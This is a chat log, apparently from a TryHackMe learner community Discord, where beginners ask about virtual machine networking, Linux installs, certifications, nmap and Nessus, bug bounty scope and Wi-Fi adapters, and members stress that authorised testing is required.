for IT I have found GPT to get most of the answers correct the only thing that it struggles with in my experience is programming ( multi page programs or just slightly complex ) or any maths problem at undergraduate level.

upper lily
#

Hi

tawdry dove
#

Hello

brisk folio
#

Hey

topaz egret
#

I remember having to teach chat gpt more than learn from it

quartz heron
velvet hawk
#

i found that gpt sometimes got the calculus questions correct mostly differentiation, but in proof questions involving a bunch of external lemmas and theroms it just shat the bucket and waffled for entire page.

smoky mortar
forest igloo
#

am I the only one that have problems with kali on virtual box, randomly the network no longer work, for example I no longer can ping google

little shore
dim delta
#

.

radiant jacinth
#

how do i get rid of the scroll bars on my vm for virualbox?

south inlet
#

Set the display to match your monitor in full screen, I feel VB is bad for that.

surreal quiver
#

Hi guys, I'm trying to install install dual boot windows and ubuntu 24.04.1 but it isn't detecting windows I can only erase the whole disk then install. I did some googling and I have turned off fast startup, made 100gb free space for ubuntu and disabled the secure boot but it still isn't giving the option for dual boot. I could really use some help with it since I'm new to ubuntu.

twin ridge
#

If you absolutely need both, use wsl2

#

If you need a hacking box, use a vm

surreal quiver
#

Why not?

vague sierra
# surreal quiver Why not?

Adding two OS's is just adding the opportunity for errors. If you use windows more than linux i'd advise installing windows and then running Linux VM's and vice versa if you use linux more than windows.

surreal quiver
#

Well thanks for your advice I'll try out the VM first then

twin ridge
#

Also windows generally doesn't seem to like dual booting

shell trellis
tawdry dove
surreal quiver
#

I'm new to it so it seemed like the best option to try it out since I saw it automatically installs grub for dual boot and you can make the partition for it when installing it but when I get to the how do you want to install it there isn't an option for windows like it doesn't even detect it just to erase the whole disk and install on it what I don't want to do without trying it out and getting more familiar with it

astral fox
#

After connecting the software .ovpn to Kali via the configuration file using the openvpn /path command.ovpn remains enabled
2024-11-10 04:28:28 Initialization Sequence Completed
2024-11-10 04:28:28 Data Channel: cipher 'AES-256-CBC', auth 'SHA512', peer-id: 9, compression: 'stub'
2024-11-10 04:28:28 Timers: ping 5, ping-restart 120
. At the same time, if ping is enabled, it sends 4-5 packets, then stops.

tawdry dove
surreal quiver
#

I'm thinking about replacing windows 10 with ubuntu but I'm seeing this posts that it's got a lot of bugs. Is anyine using the newest version of ubuntu? If yes what has your experience with it been like?

south inlet
#

Ubuntu probably has less annoying bugs than Windows tbf.

fallow schooner
#

Depends on your system. If you have a new laptop, especially a nice one, I’d do Pop_os instead of Ubuntu. Anything else do Ubuntu

#

There’s a reason servers operate on Linux

#

You can just use a VM if you want to try it out

south inlet
fallow schooner
#

Most*

#

Cloud and web hosting is mostly Linux it’s not really close

south inlet
#

I'm talking in orgs, Windows Server dominates the OS use list.

#

It may not be 71% now, like it was in 2019, but it won't be too far off.

fervent tendon
#

How did you reset the password?

summer verge
summer verge
fallow schooner
#

It’s great for newer laptops, cause it automatically does the gpu kernal configuring

#

Little bit of bloatware, but I’ve used like 80 percent of it anyways

tawdry dove
#

Fedora is stable

#

Fedora 41 just released too

zealous hull
#

man i bough a lenovo T440 to run specificly linux, but i don't have a use case to using it at all for now 💀. I have ipad for entertainement and my rig for gaming / HTB training.

summer verge
radiant jacinth
#

Hello, I am a weak person and I am still being treated for my addiction to games and pornography. Is it possible for someone to suggest some good hobbies for me to do in my life in addition to studying? Sorry for this embarrassing question, but my life is empty and I want to learn hacking so that I can protect people from the harm of pornography and games.

#

sorry

weary meteor
#

You can start here

tawny torrent
#

Start to think how the specific thing work then you don't have a time to think about porn again 🙂

haughty orchid
#

Will there be a discount on annual subscription

south inlet
#

I say probably, I'm not staff, I won't/don't know for certain

calm sigil
south inlet
#

I've not had any confirmation yet on my job application.

radiant jacinth
hoary nymphBOT
#

Gave +1 Rep to @tawny torrent (current: #2351 - 1)

radiant jacinth
#

Hello friends, I am an Arab and I want to learn English in addition to networks and hacking. Do you know a good source for learning the language from scratch? Oh, and another question: Is the Comptia course good for me to start with since it is free on the Professor Messier website? Should I start with it or not?

#

Oh also I am speaking from Google Translate now

strong sand
#

CompTIA exam preparation is good. The exams are geared towards professionals (and priced accordingly), but they're apparently worth it if you're looking at getting a job in this field

weary meteor
#
TryHackMe

CompTIA PenTest+ is for cybersecurity professionals tasked with penetration testing and vulnerability management. Use this pathway as supporting content and pre-preparation for the CompTIA certification exam. Upon completing this pathway get 10% off the exam.

deep badger
#

guys when you're all sleepy and there's apathy, how do you regain motivation

#

That guy seems to have a good grip on English.

#

I understand about a dozen languages but my speaking skills... oh boy. Should start working on that too

fading nebula
deep badger
#

thank you! you're right

weary meteor
rustic trail
#

anyone who wants to grind tryhackme with me as a friend?

deep badger
#

hahah that's true some days too!

jolly wagon
#

Hi

unique sentinel
#

sure

#

@rustic trail i will

gritty pebble
brisk folio
#

any golang enjoyers? i'm learning it for my job rn

rustic trail
#

anyone who has done the junior pentester path on thm? what other things should I do to complement it?

lucid lava
rustic trail
#

what are you doing now?

lucid lava
#

Hii everyone I want to play CTF challenge on integrity can anyone join me I need a team mate

lucid lava
lucid lava
rustic trail
weary meteor
lucid lava
rustic trail
weary meteor
lucid lava
#

Yaa right

deep badger
#

guys do you ever feel incredibly dumb

#

while doing labs

#

also, do you remember all the commands you ever need? I look everything up each time. My friend who works in cybersec essentially does the same

#

is there a way to train yourself to not forget anything

south inlet
#

Take notes, and use them.

compact fractal
deep badger
#

yeah that's a good idea 🙂

#

yeah thanks guys I'll do that

forest igloo
#

My Kali installation started having DNS problems. After a few minutes of use, the internet randomly stops working.

#

is a bug from the last update of kali or is mine

summer verge
tawny torrent
#

@forest igloo Are you running it in a VM?

keen swan
tawny torrent
# forest igloo yes

This may be caused do the network connection in your VM settings. If the the connection settings is good then try to refer the dns configuration of your machine. If the issue didn't solved tell us we will help you

radiant jacinth
radiant jacinth
#

وانت اخي

ionic hornet
south inlet
#

@radiant jacinth and @radiant jacinth

English only please.

radiant jacinth
radiant jacinth
ionic hornet
civic rootBOT
#

:mute: oalotfy#0 has been muted.

south inlet
hoary nymphBOT
#

Gave +1 Rep to @south inlet (current: #1 - 2983)

rustic trail
#

What are the prerequisites for bug bounty hunting??

weary meteor
jaunty bolt
#

Hello, I want to ask something, I don't have a university diploma, is there any possibility of finding a job in this field other than reference by getting a certificate?

small shard
rustic trail
weary meteor
radiant jacinth
#

Good morning, my brothers

jaunty bolt
rustic trail
weary meteor
#

This is also a channel on Discord dedicated to bug bounty

radiant jacinth
#

Do you get me? When I get home, I will send you a hacking or cybersecurity plan, certificates, and you choose which certificates you want.

hoary nymphBOT
#

Gave +1 Rep to @fathom jolt (current: #2357 - 1)

radiant jacinth
worn valve
#

hi

weary meteor
jovial forum
weary meteor
jovial forum
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #24 - 363)

radiant jacinth
gusty nymph
#

@errant nova are you active on HTB?

willow cedar
weary meteor
south inlet
#

This channel isn't dedicated to bug bounty, #bug-bounty is 😅

tame quarry
#

Does anyone here have experience with implementing an ISMS?
I got myself into a new, nice position as an information-security-advisor and I inherited an ISMS that my company wished to implement but forgot about for years.

So I have a 20% finished, 3000 points long checklist which needs to be reworked (cause it is REALLY out of date). Does anyone have pointers or advice? I already use government advisory documents and CIS Benchmarks, but is there anything else you would advise me to do?

left ridge
tame quarry
#

But Thank you!

left ridge
#

No need to certify.

radiant jacinth
#

here

final trellis
#

Hi friends

#

Anyone know the answer for this
To whom did you escalate the event associated with the malicious IP address?

#

Pls help me

#

I tried several times using Junior Security Analyst, Security Analyst, Security operation center
All wrong

tawdry dove
stark stump
stark stump
stark stump
gusty nymph
stark stump
#

As it was reported months ago...

young gulch
#

Don't work on my phone 🫡 , no my whatsapp privacy is safe

fallow knoll
#

is there a way to connect through my whatsapp account without a phone ?

viral karma
#

I don't think so

young gulch
#

You have a app on desktop , but you need to login 1 time with phone

fair vine
#

yeah i dont think you can access without your phone if you have never logged in to whatsapp web

rustic trail
#

is windows fundamentals necessary for pentesting?

weary meteor
nimble frigate
gaunt loom
#

finished london bridge today - out of my depth with some of it, need to work on my fuzzing discipline big time, but at least i did the last bit all on my own

mortal plover
#

Maybe a question for the ones who are pentesters. What do you prefer: to use with nmap -sT or -sS? Tested the sS on my system with wireshark and it still caught the ip address so the „stealth“ option doesn’t make any sense to me or does it?

fathom panther
#

For pentesting, you rly wouldn’t use nmap unless there’s specific reason to do so. You would usually use a tool like Nessus which the IP is whitelisted by the client and aggregate the findings from it to find exploitable vulnerabilities.

hollow viper
#

Do you guys get the feeling where you forgot most of the stuff and even the what you have learned when you get the motivation!!

daring vapor
#

Nessus is a great tool, but as an addition to other means of enumeration. nmap/masscan or a similar port scanner should still be utilised if you are working on a real project

mortal plover
#

Added the Nessus Room to my to-do list.
Well my question is because i don't have "real life" experience with those tools on a real project and im just learning right now here. Until i finish the Red Teaming Path and try to get some customers to try it out in the "real world".

mortal plover
daring vapor
fathom panther
# daring vapor Hmm? I will strongly disagree, if Nessus is the only software used for reconnais...

I agree that you shouldn’t only use Nessus when doing pentest. I also said that you wouldn’t use nmap unless there’s a specific reason to do so. The only reason I’m bringing up Nessus (or other tools for that matter) is that they have a vulnerability database that can easily be mapped to find vulnerabilities unlike nmap and masscan in which you have to turn on different options for. They also have a UI which is easily readable, mappable, and are able to generate report/data that can be plugged in to other reports.

fathom panther
daring vapor
#

Well, still that would not be the best methodology to recommend, especially to pentesters that are new to the industry. Nessus (or other vuln scanners) generates a lot of false positives and it can make the pentest less efficient. Most of the enumeration should still be manual, and actually in many scenarios you will not be able to utilize vuln scanners.

fathom panther
#

I agree there are scenarios where vuln scanners can’t be used but it should be in the interest of the client for vuln scanners to be used so as to make the most out of their time and budget.

#

But as always, it depends on the scope.

daring vapor
#

I've worked with networks that consisted of tens/hundreds of thousands of hosts and still, the tests were not based on vuln scanners, these were just used as a point of reference and help for catching the low hanging fruit

fathom panther
fathom panther
daring vapor
#

That's quite misleading

fathom panther
#

I’m not sure how it can be misleading. You can definitely use nmap and other tools for enumeration but my point is vuln scanners like Nessus exist for a reason. You use data from it to find exploitable vulnerabilities. This is where you mention low-hanging fruits but of course you aren’t limited to that. One example is these scanners also do port scans. Data found from that can be confirmed with nmap for example.

coral patrol
#

Can anyone help me I don't know the password to my neighbour's wifi I want to use it

coral patrol
coral patrol
south inlet
coral patrol
#

Can anyone tell me what I can use this server for

coral patrol
mortal plover
#

Just checked Nessus Professional and the expert option

Vulnerability scoring with CVSS v4, EPSS and VPR (for Top 10 Vulns)

Thats quite limiting on purpose in my opinion (both options have that for the Top 10 Vulns)

I will def. consider Nessus as a tool with nmap

BUT not for now kekw because of the price.

Buy Nessus Expert
Select your license
Buy a multi-year license and save more.

1 Year - €6,343.29

Not in my budget kekw

#

So it would be a good decision to write something in python to check the exploit database with what i have found with nmap to automate that part

south inlet
mortal plover
#

Maybe another logical question because for this im not sure. For Example i have the permission from company X to run a test on them and they have their webhosting on company Y.

They are fine so far but for example i find a vuln on their database they use because of their webhosting service from company Y - they didnt update it.

First - should the webhosting company Y be also informed that a scan will happen?

Second - the problem is at the company Y because they didn't update their database.
The report is ofc going to company X but I should also get in touch with the webhosting company Y for that and maybe make some extra $ ?

This is all hypothetical just had that in my mind since many companies use a hosting service.

south inlet
#

Company Y should be asked for permission first.

#

As it's their services and potentially their hardware etc

quaint basin
#

That's when you would request a Letter of Authority.
Basically tell company X to get written permission from company Y allowing you to test the service which they provide to company X.

desert carbon
#

hey there

#

how are you everyone

fervent cave
#

pretty much good night so far , you?

brisk folio
#

good evening everyone

weary meteor
brisk folio
thorny fulcrum
#

Hi, I have a question. I am doing the Pre Security and I don't know if my study method is good. It is really helpful to resume the courses on a document? Because I have the feeling that I am loosing a lot of time. I am a kinda stressed when I don't know exactly something but when I spend 2 hours on a section that TryHackMe tells me will take 30 minutes, I feel like a failure. Sorry for the mistakes, I am also learning english

weary meteor
weary meteor
ripe valley
#

hey guys...im new here....i have a question....you know those scenarios where you the examiners give you values of RGB and then you gotta answer whats gonna be the value....how do I solve those?

brisk folio
thorny fulcrum
#

Ok thank you for your help!

rustic trail
#

windows fundamentals are so boring anyone who feel that type of way?

weary meteor
rustic trail
#

what if I forget the info after learning it?

weary meteor
rustic trail
#

how to practice windows fundamentals?

south inlet
rustic trail
#

yes

brisk folio
manic stratus
radiant jacinth
#

be quiet in the libary please

rugged wren
#

sup guys

#

got a question

#

are grey hat hackers good or bad?

#

helping

#

.

#

.

keen swan
# rugged wren are grey hat hackers good or bad?

Typically don't have malicious intent, but may break into systems without permission to find vulnerabilities. They may then report their findings to the system's owners, or expose the exploit publicly if the owners don't respond. hackerman

rugged wren
#

ty

tawdry dove
keen swan
tawdry dove
# keen swan ?

Every action in your message is illegal. The point I'm trying to get across is that there is no grey, you're either within the law or you're not.

livid shadow
tawdry dove
livid shadow
#

Oh, yeah, fair. Thanks for pointing it out.

vital bay
#

is there gonna be a black friday coupon/sale this year?

weary meteor
little shore
# keen swan ?

What @tawdry dove was trying to point out is that there has to be permission from an authorised personnel or in the case of bug bounties, clearly defined scope.

Suggest reading up on the terms or guidelines followed by Google's ZDI as well.

keen swan
little shore
austere widget
#

Shhhh

quaint basin
#

Or more to the point, prosecuted...

quaint basin
# keen swan Yea but sometimes people may go out out of scope to gain extra rewards <a:hacker...

The "reward" for that is generally prison.
Do not go out of scope. It doesn't make you cool, or edgy. It's not a "calculated risk to gain more rewards".

All it does is prove that you are a bad representative of our industry. It gives all legitimate hackers and bounty hunters a bad name. The scope is a contract between you, the bounty platform, and the target. Choosing to ignore that makes you unethical.

quaint basin
#

... Then why are you suggesting it.

quaint basin
#

Your emoji choice there also contradicts your words more than a little kekw

quaint basin
# keen swan .

As Moose said, there's nothing "grey" about this. It's illegal and unethical, pure and simple 🤷‍♂️

keen swan
quaint basin
#

Ah, then you might wanna avoid putting a "hackerman" emoji at the end of your point. It kinda implies otherwise 😆

little shore
hoary nymphBOT
#

Gave +1 Rep to @quaint basin (current: #9 - 801)

balmy acorn
#

hlo

latent spear
#

Hello!
I was thinking on getting raspberry pi, because I heard that you can make some nice hacking and networking projects with it. Does anyone recommend getting it? I just want to know if this is truly worth it

lament bison
chrome elbow
final spade
spark sun
latent spear
#

Alrighty I will take all of your answers to heart
Thank you!

jovial forum
#

@south inlet Could i dm?

#

for the draft

south inlet
#

Sure

jovial forum
#

Sent

languid mirage
#

Hi
Dear friends i'm new here✌️

weary meteor
dusty meteor
weary meteor
dusty meteor
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #16 - 510)

shell summit
dusty meteor
#

Hello

shell summit
#

How's you?

modern halo
#

Hi

keen swan
#

Hey @dusty meteor, welcome to the Community thm

dusty meteor
#

Hi everyone, it is really great to be here. Studying alone is terrifying 😬😁

#

I am a complete beginner and just joined the community. I have enrolled in pre security path and done the first task, which asks to solve a question. However, the second task asks me to hack my first website, connecting to a VM. I find it confusing. Can anyone, who realized what I am talking about, suggest me a solution? I mean I maybe need to first learn sth, but idk what 🤔
I will be glad if you help, or please let me know if here isn't the right place to ask this question.
Thanks

weary meteor
dusty meteor
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #16 - 512)

drowsy onyx
#

i have a question for yall , anyone ever did the OrangeHRM on owasp / dvwa ?

hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #16 - 528)

noble stream
#

As a security analyst, how would you answer a tell me about a time you worked on a team task question ? What example or answer would the HM be looking for ?

tawdry dove
radiant jacinth
#

Hello guys, I need to install Linux as a virtual system on an Android 13 RAM 3 mobile. Can someone help me?

smoky mortar
shut shuttle
long geyser
#

Does anyone here use FortiSIEM and have their own SOAR setup? Specifically I'm interested in whether I can have FortiSIEM communicate towards an external platform and send information, the documentation I can find is centered around inbound data rather than outbound.

radiant jacinth
#

How do I do that?

spark sun
buoyant cliff
#

Hello. I want to start learning CTF and keeping my foot in the competitions around. I need someone to mentor me in this regard

gritty pebble
buoyant cliff
worn knot
#

hey to everyone ,can i ask you about how can i get or find a voucher coupons ?

fair sable
tame barn
weary meteor
buoyant cliff
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #15 - 551)

weary meteor
buoyant cliff
#

😄

daring vapor
#

@south inlet

civic rootBOT
#

Done!

wispy beacon
#

hi

weary meteor
#

Welcome 🙂

bright scaffold
#

Hi everyone

weary meteor
formal sand
#

welcome

novel geyser
#

How are the ReCapMe's calculated? It said my longest streak was 52 days this year but my current streak is over 1000

slow edge
#

I would assume ongoing streaks are not included

novel geyser
restive whale
#

Hello everyone! I was going to ask if there is a glitch with the ReCapMe, because it says my learning time is 12, 960 minutes, but I have recently started using TryHackMe?

brisk folio
restive whale
hoary nymphBOT
#

Gave +1 Rep to @brisk folio (current: #1573 - 2)

brisk folio
restive whale
sleek briar
#

So, cisco is a monopoly?

tawdry dove
sleek briar
#

doesnt it embrace like 90% of the market?

tawdry dove
#

Did you conduct a search of their market share utilizing your favorite search engine?

odd acorn
#

From a very brief search I would probably say 60% is around what they do embrace

regal sonnet
#

its like a workout or smthng? lmao

soft pier
#

it stands for reputation... you get one for every time someone sends a message thanking you with pings or mentions

humble zealot
#

What's the purpose of this channel?

south inlet
humble zealot
#

Hello everyone, i am new and have zero knowledge in the field of cybersecurity so how to get started with THM?, i have the subscription and Kali Installed as dual boot in my system that's it

weary meteor
worldly holly
#

👀

errant nova
wide sky
#

..

forest igloo
#

where I can find machines with SCADA

#

I want to learn more and I dont find machines to pentest

south inlet
#

SCADA is more commonly found in ICS

young peak
#

^which you should not attack lol

lofty vapor
#

Hallo

young peak
#

Don't go messin with the plcs mang

#

👋

lofty vapor
#

I am also new join 😄

young peak
#

Cybersecurity is awesome. Good job starting.

#

As technology advances further, exponentially the importance for securing it also raises.

river nexus
#

hi

#

where should i start to be a hacker?

magic moss
#

uh ... ur in the THM sever? Is that a real question, and if so, what is ur lvl of exp now?

magic moss
# river nexus where should i start to be a hacker?

I started with web dev, got amazingly frustrated with how this industry works and wnated to break everything, and boom!! there was THM to help me leanr ... so ... here I am now, a total beginner, but well on my way to understanding things I never did before.

strong harness
#

Hello everyone, If anyone has an extra TryHackMe voucher they are not planning to use, I would be truly grateful if you could kindly share it with me. Your generosity would be greatly appreciated.🥹

Thank you so much for considering my request.

weary meteor
weary meteor
strong harness
#

1 year approx or I think more than that...

#

But this time I genuinely want to stay consistent because it's about for my career now. I am a fresher and need to clear my concepts and practical learning. And without these, I will not get the job.

weary meteor
strong harness
#

My specialization is in Information Security. So, I am more focused on that side. But tryhackme is giving me so many other areas where I can get great skills. Like Penetration testing... and many more. I really want to discover my best self.

weary meteor
weary meteor
strong harness
#

I promise you, I will stay consistent for sure. I will not disappoint you .

weary meteor
#

Remember to practice every day 🙂 .

strong harness
#

I would be really really grateful to you.... I truly appreciate your kindness and support.Thank you so much

weary meteor
strong harness
#

Okay..:)))

weary meteor
strong harness
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #12 - 618)

strong harness
#

I have already verified. Thank you

weary meteor
strong harness
#

oh okay.

strong harness
#

Done.🙂

weary meteor
strong harness
#

Thanks!!😄

sonic crow
#

In web hacking, can I use my programming knowledge specifically to hack? Like maybe looking at a codebase and see an exploitable flaw or does it mostly rely on using tools like Metasploit and Burp?

nova tree
#

Burpsuite and metasploit won't be so effective if you don't understand application's logic

sonic crow
nova tree
#

People will use python to exploit vulnerabilities in web frameworks (joomla, wordpress) or they might want to target applications that are built with PHP, that's why Requests and Urllib are so important for crafting HTTP request, while some other libraries are more used for packet manipulation

#

Or if someone wants to simulate attack, test defense, implement security measures, etc...

sonic crow
nova tree
#

Programming is actually what elevates web hacking and lets you innovate it, that's how you learn how to craft custom exploits sets, or detect some vulnerabilities

hoary nymphBOT
#

Gave +1 Rep to @nova tree (current: #225 - 29)

buoyant cliff
#

I had a question. I have never done a CV but is it possible that I can add any TryHackMe stuffs in my resume? I am interested in cybersec stuffs so

weary meteor
buoyant cliff
#

Fair. I wish I could show my employer that I learnt stuffs from here. It's just my university doesnt teach me anything relevant to it

muted pivot
buoyant cliff
#

Thank you, will think about it

brisk folio
# buoyant cliff Thank you, will think about it

It also shows that you have the initiative to learn using available resources on your own, by your own decision rather than “school made me do this”. I think there’s value there also

digital flax
#

Hello everyone. I'm a newb just looking for a positive environment to learn. Currently work in a help desk role and I'll be starting a B.S. Degree in Cyber Security Tech. @ UMGC in January. Looking forward to being an active member! ☮️ 🩷 🤘

low stirrup
buoyant cliff
tawdry dove
#

You apply

#

First line helpdesk is entry level and doesn't require prior experience

earnest girder
amber crow
#

hey everyone , hope all doing great
need a little help , i am learning airmon ng and for this i need wifi adaptor .. i have normal wireless wifi in my house and is connected to my laptop isnt showing WLAN option when i do sudo ifconfig in my linux .. can anybody tell its bcs i am not using wifi which is connected by wire with my laptop or some other reason ?

i am using VM right now

odd acorn
amber crow
buoyant elm
#

Has anyone tried doing Advent of Cyber '24 Side Quest?

buoyant elm
#

Thanks

rain stump
#

hi

cyan stump
#

Hi!

tropic jasper
#

Anyone been in the field for a while and open to me bouncing some certification questions off of them? 😅 would be very much appreciated

fallow garden
#

All, you can definitely get an entry level help desk job with no prior experience. Companies want to see that you have customer service skills and that you’re trainable.

#

If a role says they require a degree, apply anyways. You need to sell yourself.

tropic jasper
#

That’s how I started, no prior experience with an internship. Was hired on full time as a tier 1. Moved from the help desk to an onsite technician for device installs. Switched companies and moved into a tier 2 role that I’m currently working now. Picked up a couple small Microsoft certifications along the way but nothing major. Now I want to get away from this side of the industry and move toward something security related. I have a lot of ground to cover, and would like to start working towards certification to focus my studies on a specific goal that will also help with transitioning into a security role.

fallow garden
#

Sysadmin or networking. You usually cant just jump into cyber.

tropic jasper
#

I’ve heard that a few times. My current job allows me to dip my toes in the pond with different teams. Ideally I’d like to get some hands on networking experience at my current job, but I can’t do that unless I’m hired as a full employee, currently under contract

#

I could get my A+ relatively easy after a week or two of touch up on my studies, but that feels like a waste as I really don’t want to be in my current role any longer than necessary. I thought about grabbing the network + instead and following up with the security +, but haven’t really made a move in either direction.

misty seal
#

Wow 😲 another successful business day
, Glad am making things happen it's really not easy but my determination to get started keeps me going and am glad I did, now my store has been nothing but success. To those that wish to make this happen get started now , take action be responsible for your actions stop doubting yourself that's how successful grow. Be part of the 1% who are making things happening and stop following the 99% who are giving excuse for their failure. New week, new successful unlock 🔓

obtuse laurel
#

hello everyone im a college student majoring in cybersecurity and am trying to get a entry level job but don't know where to start any pointer ?

candid swan
#

Dice and leethub, LinkedIn- US

obtuse laurel
hoary nymphBOT
#

Gave +1 Rep to @candid swan (current: #1587 - 2)

candid swan
fast pasture
unique sentinel
#

Because your using vm and ur virtual machine doesn’t have a WiFi adapter

#

Oh I guess that question was a long time ago lol nvm

dull socket
#

Was there any clues on side quest on Day 2 ?

weary meteor
fiery topaz
# amber crow hey everyone , hope all doing great need a little help , i am learning airmon n...

in case you didn't recieve any answer by now, you might need a special network interface controller to properly use airmon-ng. luckly the room for wifi hacking uses a wireshark capture pcap to answer but if you're testing on a live network with wireshark you might need a NIC with packet injection or st least monitor mode available which most built ins for laptops dont have. you re going to have to cough up 100 bucks or so